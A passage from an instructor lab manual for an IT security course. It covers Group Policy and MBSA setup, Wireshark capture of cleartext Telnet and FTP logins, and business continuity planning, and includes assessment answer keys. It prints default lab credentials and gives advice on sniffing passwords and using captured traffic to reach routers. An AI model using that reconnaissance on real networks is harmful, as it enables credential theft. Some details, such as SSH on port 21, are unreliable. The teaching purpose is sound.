2 switch. This will allow for a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations. The following are required for this hands-on lab: A) A classroom workstation (with at least 2 Gig RAM) capable of supporting an insert-able hard drive or USB hard drive with a pre-configured, virtualized server farm. This classroom workstation/server will support the virtualized server farm connected to the layer 2 switch for all VM workstations B) An instructor workstation (with at least 2 Gig RAM) that shall act as the Instructors demo LAB workstation. The instructor will display the workstation on the LCD projector to demo the loading and configuring of the Windows Server 2003 VM GPOs and MBSA C) Students lab workstations will use a local copy of the ITT Mock IT Infrastructure VM server farm contained on their removable hard drive to run their Student VM and WindowsTarget01 VM server Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -52- IT255 Instructor Lab Manual LABORATORY The following summarizes the setup, configuration, and equipment needed to perform Lab #4: 1. A Virtualized Server Farm with the following comonents: a. Microsoft DHCP server for allocating student IP host addresses b. A Student and/or Instructor VM workstation 2. TargetWindows01 VM as needed for this lab: a. Windows 2003 Server Target with MBSA 2.1.1 installed b. Administrator account access on the Windows 2003 Target VM Server c. Administrator account access Student VM Workstation Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01) o Computer Name: Windows02 o Three Users Available: administrator, instructor or student (case sensitive) o Password: ISS316Security o IP Address: DHCP o Domain Login: NO 3. Standard ITT ISS onsite student workstation must have the following software applications loaded to perform this lab: a. VMware Player 3.x b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers Recommended Procedures Instructor Demo Lab#4: The instructor will demonstrate the use of Group Policy Objects in Windows Server 2003 to create a password policy definition and link it to the newly created domain from the previous lab. In addition, the instructor will also demonstrate running the Microsoft Security Baseline Analyzer (MBSA) and discuss the results of the MBSA scan with the students. MBSA is a security assessment tool from Microsoft that helps track missing security updates and less-secure security settings within the Microsoft Windows platforms. Hands-on Lab #4 Instructor Steps: The Instructor will perform the following demonstration: 1. Connect the instructor-removable hard drive to your workstation 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -53- IT255 Instructor Lab Manual LABORATORY 4. Login to your Instructor VM workstation, and obtain an IP host address from the DHCP server connected to the layer 2 switch NOTE: If the workstations in your physical classroom have only 2GB of RAM, then only two VMs can be powered-on at once. You can power-on 2 VMs at once WindowsDHCP01 and TargetWindows01 to maximize performance or you can load the WindowsDHCP01 VM server in a separate workstation connected to the classroom layer 2 switch. This will provide you with the ability to load the Instructor VM workstation and the TargetWindows01 VM server in the same physical workstation. 5. Login to the Instructor VM and TargetWindows01 VM server 6. Launch Active Directory Users and Computers on Windows01: Start -> Administrative Tools -> Active Directory Users and Computers. 7. In the tree view, expand Forest -> Domains -> domainname -> right click Properties. 8. Select Group Policy Objects open the context menu, (right-mouse-click on Group Policy Objects), select New. 9. Enter PasswordGPO for the name and select OK. 10. Open the context menu of the newly created GPO and select Edit. 11. In the Group Policy Management Editor treeview, expand Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Account policies. Select Password Policy. 12. Double-click Password must meet complexity requirements and choose Enable. Choose OK. 13. Double-click Minimum Password Length and enter 8. Choose OK Figure 12 Microsoft Windows Group Policy Management Editor 14. Close the Group Policy Management Editor. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -54- IT255 Instructor Lab Manual LABORATORY 15. Open the context menu for the domain and select Link an Existing GPO 16. Select PasswordGPO and choose OK. 17. Open the context menu for PasswordGPO and choose Save Report. Enter the desired filename and folder to save the PasswordGPO report. 18. Launch MBSA from the Windows Server 2008 R2 desktop. 19. Select Scan a computer. 20. Remove the check mark from Check for security updates if the system does not have internet access. 21. Choose Start Scan. Figure 13 Microsoft Windows Baseline Security Analyzer 22. When the scan is complete, select Copy to clipboard to save the output to the clipboard. 23. Open Notepad, paste the clipboard contents, and save the MBSA scan results. Hands-on Lab#4 Student Steps: To perform this hands-on lab, students are required to perform the following steps: 1. Connect the student-removable hard drive to your workstation. 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -55- IT255 Instructor Lab Manual LABORATORY 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host. address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1. 4. Login to your Student VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch. NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You can power-on 2 VMs at once WindowsDHCP01 and TargetWindows01 to maximize performance or you can load the WindowsDHCP01 VM server in a separate workstation connected to the classroom layer 2 switch. This will provide you with the ability to load the Student VM workstation and the TargetWindows01 VM server in the same physical workstation. 5. Login into the Student VM and Windows01 Target VM. 6. Launch Active Directory Users and Computers on Windows01: Start -> Administrative Tools -> Active Directory Users and Computers. 7. In the tree view, expand Forest -> Domains -> domainname -> right click Properties. 8. Select Group Policy Objects, open the context menu, (right-mouse-click on Group Policy Objects), select New. 9. Enter PasswordGPO for the name and select OK. 10. Open the context menu of the newly created GPO and select Edit. 11. In the Group Policy Management Editor treeview, expand Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Account policies. Select Password Policy. 12. Double-click Password must meet complexity requirements, and choose Enable. Choose OK. 13. Double-click Minimum Password Length and enter 8. Choose OK. Figure 12 Microsoft Windows Group Policy Management Editor 14. Close the Group Policy Management Editor. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -56- IT255 Instructor Lab Manual LABORATORY 15. Open the context menu for the domain, and select Link an Existing GPO 16. Select PasswordGPO, and choose OK. 17. Open the context menu for PasswordGPO, and choose Save Report. Enter the desired filename and folder to save the PasswordGPO report. 18. Launch MBSA from the Windows Server 2003 desktop. 19. Select Scan a computer. 20. Remove the check mark from Check for security updates if the system does not have internet access. 21. Choose Start Scan. Figure 13 Microsoft Windows Baseline Security Analyzer 22. When the scan is complete, select Copy to clipboard to save the output to the clipboard. 23. Open Notepad, paste the clipboard contents, and save the MBSA scan results and submit as part of your Lab #4 deliverables. Deliverables Upon completion of the Group Policy Objects and MBSA lab, students are required to provide the following deliverables: 1. Lab #4 Soft copy of your GPO report for the GPO created in this lab in HTML format 2. Lab #4 A Word document that contains the results of the MBSA scan 3. Lab #4 Assessment Questions & Answers Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -57- IT255 Instructor Lab Manual LABORATORY Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #4 that the students must perform: 1. Was the student able to define Active Directory Group Policy Objects (GPO) in Windows 2003 Server? [20%] 2. Was the student able to deploy GPOs to domain workstations within Windows 2003 Server? [20%] 3. Was the student able to configure login credentials and specify password requirements and parameters for domain workstations within Windows 2003 Server? [20%] 4. Was the student able to use Microsoft Baseline Security Analyzer (MBSA) to security baseline a Windows 2003 Server and Windows XP Professional Workstation? [20%] 5. Was the student able to facilitate the automatic and online security updating and patching from Microsofts web servers via the Internet for Windows 2003 Server and Windows XP Professional Workstation? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -58- IT255 Instructor Lab Manual LABORATORY Lab #4 Assessment Worksheet Configure Group Policy Objects and Microsoft Baseline Security Analyzer (MBSA) Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview During this lab the students will use Group Policy Objects to create a Minimum Password Length Password Policy and link it to the newly created domain from the previous lab. They will also be running the Microsoft Security Baseline Analyze (MBSA) and discussing the results of the MBSA scan with the class. Lab Assessment Questions & Answers 1. Define why change control management is relevant to security operations in an organization? Technology advances, newly-discovered vulnerabilities, updates requiring restarts which affect availability and the maintenance of system integrity! 2. What type of access control system uses security labels? Mandatory access control 3. Describe two options you would enable in a Windows Domain password policy? Complex requirements are requiring capital & lowercase, special characters & numbers or any combo. Require 8 or more characters. Enforce passwords refreshes every 30-45 days. Enforce history being kept for up to the last x amount of passwords. 4. Where would patch management and software updates fall under in security operations and management? Change control management Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -59- IT255 Instructor Lab Manual LABORATORY 5. Is there a setting in your GPO to specify how many login attempts will lockout an account? Name 2 parameters that you can set to enhance the access control to the system. Yes. You can set the duration of the lockout period and the maximum number of login attempts before lockout. 6. What are some Password Policy parameter options you can define for GPOs that can enhance the C-IA for system access? a. Enforce password history so old passwords are not able to be re-enabled b. Maximum password age how many days or months is the maximum allowed use of a password c. Minimum password age minimum number of days or months that a password must be used d. Store password using reversible encryption 7. What sources could you use as a source to perform the MBSA security state? a. WSUS Server Microsoft Update live site Microsoft Update (offline) b. c. 8. What does WSUS stand for, and what does it do? Windows Server Update Services works like the Windows Update website. It contains updates for Windows or other MS apps, but it is controlled by the administrator of the corporate environment, 9. What is the difference between MBSA and Microsoft Update? Microsoft Update is a Website that can scan a single computer and indicate missing/needed security and non-security updates and install them as a group automatically and completely transparent to the user. MBSA performs a Windows centric vulnerability assessment scan and identifies missing/needed security updates and software patches. 10. What are some of the options that you can exercise when using the MBSA tool? a. Check for Windows administrative vulnerabilities b. Check for weak passwords c. Check for IIS administrative vulnerabilities d. Check for SQL administrative vulnerabilities e. Check for security updates Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -60- IT255 Instructor Lab Manual LABORATORY Laboratory #5 Lab #5: Perform Protocol Capture & Analysis Using Wireshark & Netwitness Investigator Learning Objectives and Outcomes Upon completing this lab, students will be able to: Use Wireshare & Netwitness Investigator as a packet capture and protocol analysis tool Capture live IP, ICMP, TCP and UDP traffic using TELNET, FTP, TFTP, and SSH sessions Examine captured packet traces to view clear-text and cipher-text Analyze the packet capture data in Netwitness Investigator and be able to identify the difference between UDP and TCP sessions Identify common network related protocols used for client-server communications, network management and network security Required Setup and Tools This lab requires the use of the ISS Mock IT Infrastructure and Virtualized Server Farm. This is shown below: Figure 1 ISS Onsite Mock IT Infrastructure & Virtualized Server Farm Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -61- IT255 Instructor Lab Manual LABORATORY The Mock IT Infrastructure and Virtualized Server Farm is a preconfigured, IP network infrastructure complete with a classroom Cisco WAN and a virtualized server farm. All IP addressing schema, VLAN configurations, and layer 3 switching is preconfigured. The IP networking infrastructure remains static and only needs the following removable parts: A) A classroom workstation (with at least 4 Gig RAM) capable of supporting an insert-able hard drive or USB hard drive with a preconfigured, virtualized server farm. This classroom workstation will support the virtualized VM server farm connected to the classroom layer 2 switch and the connection to ASA_Instructor B) An instructor VM workstation (with at least 2 Gig RAM) that shall act as the demonstration traffic generator for the protocol capture of hands-on labs. The Instructor will engage ARP, DHCP, ICMP, TCP 3-way handshake, FTP, HTTP, TELNET, and SSH to demonstrate protocol interaction from a preconfigured Instructor Virtual Machine (VM). The Instructor workstation connects to the same layer 2 switch and then to the ASA_Instructor C) Student VM workstations (with at least 2 Gig RAM) use a preconfigured Student VM to act as an Attacker VM as well as a traffic monitoring and protocol capture device. Since all the Student VM workstations are connected to the same layer 2 switch, students can perform the protocol interaction lab (i.e., arp, dhcp, ping, telnet, ssh, tftp, ftp, etc.) while they capture their own packets using Wireshark as a protocol capture tool The following summarizes the setup, configuration, and equipment needed to perform Lab #5: 1. Standard ITT Mock IT Infrastructure and Virtualized Server Farm configuration and setup a. Cisco 2801 routers, 2960 catalyst LAN switches, and ASA 5505 firewalls with OSPF core and VLANs 2. A Virtualized Server Farm with: a. Microsoft DHCP server for allocating student IP host addresses b. A Student and/or Instructor VM workstation 3. Target VMs as described by the Lab: a. Instructor and Student VM workstations with desktop applications and tools: o Wireshark 1.2.9 for packet capturing and protocol analysis o NetWitness Investigator v 9.0 for packet capturing and protocol analysis o TELNET and SSH open source client software PuTTY o FTP and TFTP open source client software FileZilla and TFTPd32 o Adobe Reader for PDF Documentation Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -62- IT255 Instructor Lab Manual LABORATORY 4. Standard ISS onsite student workstation must have the following software applications loaded to perform this lab: a. VMware Player 3.x b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers Recommended Procedures Instructor Demo Lab #5: The Instructor will perform a live demonstration showing the loading and enabling of a packet capture session using Wireshark. The Instructor will initiate IP traffic by pinging from the DOS command prompt, Telnet-ing, SSH-ing, TFTP-ing, FTP-ing sample files from the Instructor VM workstation acting as client to the TargetWindows01 VM server acting as server. The Instructor will also Telnet and SSH to various Cisco devices in the ISS Mock IT Infrastructure. The students can ask questions as they become familiar with the functions of the protocol analyzer and examining packet decodes from the Data Link layer (Ethernet), to the Network layer (IP), and up to the Transport layer (TCP/UDP). Hands-on Lab#5 Instructor Steps: Steps to be performed by the instructor before and during the lab demonstration: 1. Connect the instructor-removable hard drive to your workstation 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address 3. Connect the Instructor VM workstation to the LCD overhead projector for classroom display 4. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 5. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch: Login ID: instructor or student (case sensitive) Password: ISS316Security (case sensitive) NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You have to split the VM server farm into 2 physical workstations, loading 2 VM servers in each (WindowsDHCP01 and TargetWindows01) and (TargetUbuntu01 and TargetUbuntu02) to maximize performance. 6. Power-up in VMware Player, the TargetWindows01 VM server and logon using the provided credentials: Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -63- IT255 Instructor Lab Manual LABORATORY Windows 2003 Server Standard Edition Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01) o Computer Name: Windows02 o Three Users Available: administrator, instructor or student (case sensitive) o Password: ISS316Security o IP Address: DHCP o Domain Login: NO FTP (Filezilla FTP Server) o Port: 21 o Username: instructor or student o Password: TFTP (Tftpd32 TFTP Server) o Port: 69 o Username: o Password: 7. Power-up the in VMware Player, the TargetUbuntu01 VM server and SSH logon using the provided credential: Ubuntu Server Target VM - TargetUbuntu01 Ubuntu Linux 10.04 LTS Server Name: (VM TargetUbuntu01) o Computer Name: Ubuntu01 o ONE User available ONLY in v1: administrator o Three Users available in v2: administrator, student or instructor o Password: ISS316Security (case sensitive) o IP Address: eth0 set to DHCP, eth1 and eth2 not set. SSH o Port: 21 o Username: administrator o Password: ISS316Security (case sensitive) Apache running Damn Vulnerable Web App (DVWA) o URL: http:///dvwa o Password: password o Username: admin Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -64- IT255 Instructor Lab Manual LABORATORY 8. Identify the target network device IP addresses from the following chart: 9. Load Wireshark, and start a packet capture in promiscuous mode while you perform the various traffic generating tasks 10. From your DOS command prompt, make sure you can ping the destination IP address before you attempt to TELNET, SSH, TFTP, or FTP to the destination host as follows: Ping 172.30.0.___ (your IP host address allocated by the DHCP server) Ping 172.30.0.10 (the DHCP server) Ping 172.30.0.1 (the IP default gateway router) Ping 172.X.X.X (where 172.X.X.X = IP destination address) 11. Run the PuTTY application from the Instructor VM workstation and enter the targeted IP addresses for your TELNET and SSH exercise: Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -65- IT255 Instructor Lab Manual LABORATORY a. TELNET to LAN Switch 1 and enter the userid and password of cisco / cisco b. TELNET to Indy and enter the userid and password of cisco / cisco c. TELNET to Tampa and enter the userid and password of cisco / cisco d. SSH to LAN Switch 2 (only for 2960s that support SSH) and enter the userid and password of cisco / cisco e. SSH to the TargetUbuntu01 VM server (172.30.0.X check the DHCP server for the IP host address or ask the Instructor what the IP host address is) and enter the SSH (port 21) login credentials: o o o f. Port: 21 Username: administrator Password: ISS316Security (case sensitive) SSH to WestCovina (if SSH is enabled) and enter the userid and password of cisco / cisco g. Click on TFTPd32 on your desktop, and load client on your student VM workstation. TFTP a small file from your Student VM workstation to the TFTPd32 Server on the TargetWindows01 VM server (172.30.0.X ask your instructor for the allocated IP host address of the TargetWindows01 VM server) h. Click on Filezilla FTP on your desktop and load the client FTP application on your student VM workstation. FTP a small file from our Student VM workstation to the FileZilla FTP server on the TargetWindows01 VM server (172.30.0.X ask your instructor for the allocated IP host address of the TargetWindows01 VM server) 12. Stop Capture in Wireshark and save the file as IT255 Lab #5.pcap and submit as part of your lab deliverables review the protocol decode and answer the Lab #5 assessment questions 13. Import the IT255 Lab #5.pcap file into Netwitness Investigator by first creating a new local connection called IT255 Lab #5.pcap and then import the *.pcap file into Netwitness Investigator for detailed protocol analysis and show the students how Netwitness performs protocol analysis Hands-on Lab #5 Student Steps: To perform this hands-on lab, students are required to perform the following steps: 1. Connect the instructor removable hard drive to your workstation 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address 3. Connect the Instructor VM workstation to the LCD overhead projector for classroom display Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -66- IT255 Instructor Lab Manual LABORATORY 4. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 5. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch: Login ID: instructor or student (case sensitive) Password: ISS316Security (case sensitive) NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You have to split the VM server farm into 2 physical workstations, loading 2 VM servers in each (WindowsDHCP01 and TargetWindows01) and (TargetUbuntu01 and TargetUbuntu02) to maximize performance. 6. Power-up in VMware Player, the TargetWindows01 VM server and logon using the provided credentials: Windows 2003 Server Standard Edition Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01) o Computer Name: Windows02 o Three Users Available: administrator, instructor or student (case sensitive) o Password: ISS316Security o IP Address: DHCP o Domain Login: NO FTP (Filezilla FTP Server) o Port: 21 o Username: instructor or student o Password: TFTP (Tftpd32 TFTP Server) o Port: 69 o Username: o Password: 7. Power-up the VMware Player, the TargetUbuntu01 VM server and SSH logon using the provided credential: Ubuntu Server Target VM - TargetUbuntu01 Ubuntu Linux 10.04 LTS Server (VM Name: TargetUbuntu01) o Computer Name: Ubuntu01 o ONE User available ONLY in v1: administrator o Three Users available in v2: administrator, student or instructor Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -67- IT255 Instructor Lab Manual o o LABORATORY Password: ISS316Security (case sensitive) IP Address: eth0 set to DHCP, eth1 and eth2 not set. SSH o Port: 21 o Username: administrator o Password: ISS316Security (case sensitive) Apache running Damn Vulnerable Web App (DVWA) o URL: http:///dvwa o Password: password o Username: admin 8. Identify the target network device IP addresses from the following chart: 9. Load Wireshark and start a packet capture in promiscuous mode while you perform the various traffic generating tasks Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -68- IT255 Instructor Lab Manual LABORATORY 10. From your DOS command prompt, make sure you can ping the destination IP address before you attempt to TELNET, SSH, TFTP, or FTP to the destination host as follows: Ping 172.30.0.___ (your IP host address allocated by the DHCP server) Ping 172.30.0.10 (the DHCP server) Ping 172.30.0.1 (the IP default gateway router) Ping 172.X.X.X (where 172.X.X.X = IP destination address Refer to IP Address Chart in Step #8) 11. Run the PuTTY application from the Instructor VM workstation and enter the targeted IP addresses for your TELNET and SSH exercise: a. TELNET to LAN Switch 1 and enter the userid and password of cisco / cisco b. TELNET to Indy and enter the userid and password of cisco / cisco c. TELNET to Tampa and enter the userid and password of cisco / cisco d. SSH to LAN Switch 2 (only for 2960s that support SSH) and enter the userid and password of cisco / cisco e. SSH to the TargetUbuntu01 VM server (172.30.0.X check the DHCP server for the IP host address or ask the Instructor what the IP host address is) and enter the SSH (port 21) login credentials: o o o f. Port: 21 Username: administrator Password: ISS316Security (case sensitive) SSH to WestCovina (if SSH is enabled) and enter the userid and password of cisco / cisco g. Click on TFTPd32 on your desktop and load client on your student VM workstation. TFTP a small file from your Student VM workstation to the TFTPd32 Server on the TargetWindows01 VM server (172.30.0.X ask your instructor for the allocated IP host address of the TargetWindows01 VM server) h. Click on Filezilla FTP on your desktop and load the client FTP application on your student VM workstation. FTP a small file from our Student VM workstation to the FileZilla FTP server on the TargetWindows01 VM server (172.30.0.X ask your instructor for the allocated IP host address of the TargetWindows01 VM server) 12. Stop Capture in Wireshark and save the file as IT255 Lab #5.pcap and submit as part of your lab deliverables review the protocol to decode, and answer the Lab #5 assessment questions Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -69- IT255 Instructor Lab Manual LABORATORY 13. Import the IT255 Lab #5.pcap file into Netwitness Investigator by first creating a new local connection called IT255 Lab #5.pcap. Then import the *.pcap file into Netwitness Investigator for further protocol analysis Deliverables Upon completion of the packet capture and protocol analysis, students are required to provide the following deliverables as part of this lab: 1. Lab #5 Wireshark Protocol Capture File IT255 Lab #5.pcap 2. Lab #5 Submit a screenshot of the imported *.pcap file into Netwitness Investigator (Print Screen Copy Paste into a WORD document). 3. Lab #5 Lab Assessment Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #5 that the students must perform: Was the student able to use Wireshare & Netwitness Investigator as a packet capture and protocol analysis tool? [20%] Was the student able to capture live IP, ICMP, TCP and UDP traffic using TELNET, FTP, TFTP, and SSH sessions and distinguish them? [20%] Was the student able to examine captured packet traces to view clear-text and cipher-text data? [20%] Was the student able to analyze the packet capture data in Wireshark or Netwitness Investigator and be able to identify the difference between UDP and TCP sessions? [20%] Was the student able to identify common network-related protocols used for client-server communications, network management and network security? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -70- IT255 Instructor Lab Manual LABORATORY Lab #5 Assessment Worksheet Perform Protocol Capture & Analysis Using Wireshark & Netwitness Investigator Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview One of the most important tools needed for information systems security practitioners is a packet capture and protocol analysis tool. Wireshark is a freeware tool providing basic packet capture and protocol decoding capabilities. NetWitness Investigator is a free and commercial solution (free version allows up to twenty 1GB Collections of packet captures) that provides security practitioners with a deep packet inspection tool used for examining everything from the data link layer up to the application layer. NetWitness Investigator is the only protocol analysis tool that provides deep packet inspection and advanced decoding for simplified full packet capture and session analysis. LAB Assessment Questions & Answers 1. What is the purpose of the address resolution protocol (ARP)? A protocol used to resolve or map an IP address to a MAC layer address, so IP packets can communicate on an Ethernet LAN. 2. What is the purpose of the dynamic host control protocol (DHCP)? A protocol used by connecting workstations requesting an IP address from a DHCP server. 3. What was the DHCP allocated source IP host address for the Student VM and Target VM? {Unique for each Student workstation} 4. When you pinged the targeted IP host, what was the source IP address and destination IP address of the ICMP echo-request packet? {Unique for each Student workstation} Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -71- IT255 Instructor Lab Manual LABORATORY 5. Did the targeted IP host respond to the ICMP echo-request packet with an ICMP echo-reply packet? If yes, how many ICMP echo-request packets were sent back to the IP source? {Unique for each Student workstation} 6. Find a TCP 3-way handshake for a TELNET, FTP, or SSH session. What is the significance of the TCP 3-way handshake? A connection-oriented acknowledgement between source and destination that the TCP connection is now valid 7. What was the SEQ# of the initial SYN TCP packet and ACK# of the SYN ACK TCP packet? SEQ# = 0, ACK# 1 8. During the Instructors TELNET session to LAN Switch 1 and LAN Switch 2 what was the captured terminal password for LAN Switch 1 and LAN Switch 2? cisco 9. When the Instructor used SSH to a Cisco router, were you able to see the terminal password? Why or why not? No. SSH encrypts the data transmission between SSH client and SSH host maintaining confidentiality. 10. What other IP packets are on the VLAN and Ethernet LAN segment? How can these other IP packets provide additional clues or information about the logical IP routing and IP addressing schema? EIGRP broadcasts, DHCP broadcasts, ARP broadcasts, Cisco Ethernet interface CDP neighbor broadcasts, etc. By examining the MAC-layer addresses and IP address information of these IP packets, IP subnetwork numbers, and IP host addresses of the adjacent switch and router interfaces can be identified. Using this information may provide TELNET or SSH access to the Cisco switch or router providing additional information about the adjacent switch and router connections and overall IP network. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -72- IT255 Instructor Lab Manual LABORATORY Laboratory #6 Lab #6: Perform Business Continuity Plan Implementation Planning Learning Objectives and Outcomes Upon completing this lab, students will be able to complete the following tasks: Identify the major elements of a Business Continuity Plan (BCP) and requirements for a fictitious organization Perform a high-level Business Impact Analysis (BIA) and Risk Analysis (RA) for a fictitious organization Prioritize from the BIA and RA business functions and processes that must be part of the business continuity plan Craft a BCP plan outline that addresses the BIA and RA and business priorities Define the necessary BCP implementation planning steps that include testing, practice, and documentation maintenance of back-up and recovery procedures Required Setup and Tools This is a paper-based, hands-on lab and does not require the use of the ISS Mock IT infrastructure or Virtualized Server Farm. The following summarizes the setup, configuration, and equipment needed to perform Lab #6: 1. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab: a. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers and for crafting a BCP outline, BIA, and RA priorities b. Fictitious organization business functions and processes spreadsheet Recommended Procedures Instructor Demo Lab#6: The instructor will review the provided fictitious organization business functions and processes spreadsheet. From this list, a qualitative Business Impact Analysis (BIA) or Risk Analysis (BIA) will be performed prioritizing the identified business functions and processes. From this prioritization will come the prioritization for business continuity and recovery of the systems and the applications that support that Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -73- IT255 Instructor Lab Manual LABORATORY business function or process. The instructor will review the main concepts and areas that must be addressed in your BIA, RA, and BCP, including the major elements needed within the BCP itself. Hands-on Lab #6 Instructor Steps: The instructor will lead the following classroom discussion to set the stage for the fictitious organizations Business Continuity Planning requirements. 1. Review the fictitious organizations business functions and processes 2. Distinguish between an RA and BIA, and a BCP and DRP 3. Align the RA and BIA as the foundation for priorities for your BCP and DRP 4. Assess business drivers for prioritization of the BCP and DRP business functions and processes 5. Discuss what the process would be to perform an RA and BIA a. Develop information-gathering questionnaires b. Conduct interviews and one-on-one meetings with business leaders and departmental managers of critical business functions and operations c. Align business drivers with key business functions and processes d. Prioritize the business critical business functions and processes e. Identify the IT systems, applications, and data that support the prioritized business functions and processes f. Assess the financial impact these critical business functions and processes have on the business 6. Define the key business continuity metrics that drive the overall business continuity plan a. Business risk analysis and business impact analysis prioritization of critical business functions and processes b. Recovery Time Objectives (RTO) for critical business functions and processes c. Financial loss versus cost of recovery impact analysis 7. Discuss how to define the scope of the BCP and how that scope can be narrowed based on mission critical priorities and financial budgets 8. Discuss how business asset replacement insurance can impact the cost and investment of business continuity solutions 9. Review the major components of a business continuity plan: a. BCP Policy b. BCP Organizational Structure c. Business Impact Analysis d. IT Systems, Applications, & Data Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -74- IT255 Instructor Lab Manual LABORATORY e. BCP Drivers & Priorities f. BCP Scope and Objectives g. Business Functions & Processes Back-Up & Recovery h. BCP Testing & Plan Updating i. BCP Maintenance & On-Going Management 10. Review the elements of a BCP implementation plan a. Initiating the BCP b. Back-Up and Recovery Procedures for IT Systems, Applications, & Data c. Key BCP Personnel and Organizational Structure d. Prepare Key Documents, Tools, and Instructions for Recovery e. Handling Emergencies or Disaster Recovery Situations f. Manage Business Recovery g. Perform Business Recovery Steps h. Test the BCP i. Train IT and Departmental Personnel on Business Recovery and Back-Up Procedures j. Maintain and Update the BCP Hands-on Lab #6 Student Steps: The instructor will lead the following classroom discussion to set the stage for the fictitious organizations Business Continuity Planning requirements. 1. Review the fictitious organizations business functions and processes 2. Distinguish between an RA and BIA, and a BCP and DRP 3. Align the RA and BIA as the foundation for priorities for your BCP and DRP 4. Assess business drivers for prioritization of the BCP and DRP business functions and processes 5. Discuss what the process would be to perform an RA and BIA a. Develop information gathering questionnaires b. Conduct interviews and one-on-one meetings with business leaders and departmental managers of critical business functions and operations c. Align business drivers with key business functions and processes d. Prioritize the business critical business functions and processes e. Identify the IT systems, applications, and data that support the prioritized business functions and processes Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -75- IT255 Instructor Lab Manual f. LABORATORY Assess the financial impact that these critical business functions and processes have on the business 6. Define the key business continuity metrics that drive the overall business continuity plan a. Business risk analysis and business impact analysis prioritization of critical business functions and processes b. Recovery Time Objectives (RTO) for critical business functions and processes c. Financial loss versus cost of recovery impact analysis 7. Discuss how to define the scope of the BCP and how that scope can be narrowed based on mission critical priorities and financial budgets 8. Discuss how business asset replacement insurance can impact the cost and investment of business continuity solutions 9. Review the major components of a business continuity plan: a. BCP Policy b. BCP Organizational Structure c. Business Impact Analysis d. IT Systems, Applications, & Data e. BCP Drivers & Priorities f. BCP Scope and Objectives g. Business Functions & Processes Back-Up & Recovery h. BCP Testing & Plan 